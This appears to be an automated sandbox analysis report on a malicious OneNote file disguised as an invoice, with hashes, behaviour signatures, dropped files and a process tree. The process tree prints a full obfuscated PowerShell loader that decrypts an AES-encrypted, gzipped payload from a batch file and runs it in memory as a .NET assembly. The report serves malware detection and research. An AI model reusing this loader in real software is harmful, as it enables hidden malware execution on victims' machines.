Analysis

  • max time kernel
    1201s
  • max time network
    905s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    09/02/2023, 14:36

General

  • Target

    Invoice #0098119.one

  • Size

    203KB

  • MD5

    058978e5a0620ea2acec6da70c93683f

  • SHA1

    7f3bb69b17787470e01d4081104ac5ad012a0cde

  • SHA256

    b11b51ff96dc7a5f1cf9985087a6ad4f66980a2b2a9b1945acd43e39434c8dec

  • SHA512

    9f541872159512804adcc601391de4f05f2abc067a465f21fd8d9bb8eeba41f8e85f31a1d0e32600b23760f9dadd8530908e9b775c9ee8aee71119335b4bf69a

  • SSDEEP

    3072:NqVr2RTVYk0bjRtZLlnm6Gdk8vZQfjO8KifQ6vfegRI8mlgJJ4u6A0FzfghYTffD:cARiltZITy8ufjLQsBUlgeMYDhZ

Score
7/10

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice #0098119.one"
    1⤵
    • Drops startup file
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
      /tsr
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:616
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat.exe
        "kk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) { $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('')))
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1660

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat

          Filesize

          182KB

          MD5

          df4da1ecd4c50871a1c4315f571e4402

          SHA1

          1dbbe9b3784cf5ecdd08b27132a7e31588954865

          SHA256

          9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8

          SHA512

          5f9e47f865c48cb1f2070d5d393a5d3494074bfe2347e07c988d06c8244dd420181c210a8ebdd54f768a64a5906d0c9e3be271d44f6e5bd32991bc2cacf85d3e

        • C:\Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • \Users\Admin\AppData\Local\Temp\OneNote\14.0\NT\0\kk.bat.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • memory/1660-66-0x000000006C0D0000-0x000000006C67B000-memory.dmp

          Filesize

          5.7MB

        • memory/1660-67-0x000000006C0D0000-0x000000006C67B000-memory.dmp

          Filesize

          5.7MB

        • memory/1736-54-0x00000000729D1000-0x00000000729D3000-memory.dmp

          Filesize

          8KB

        • memory/1736-55-0x0000000076411000-0x0000000076413000-memory.dmp

          Filesize

          8KB

        • memory/1736-56-0x00000000739BD000-0x00000000739C8000-memory.dmp

          Filesize

          44KB

        • memory/1736-59-0x00000000739BD000-0x00000000739C8000-memory.dmp

          Filesize

          44KB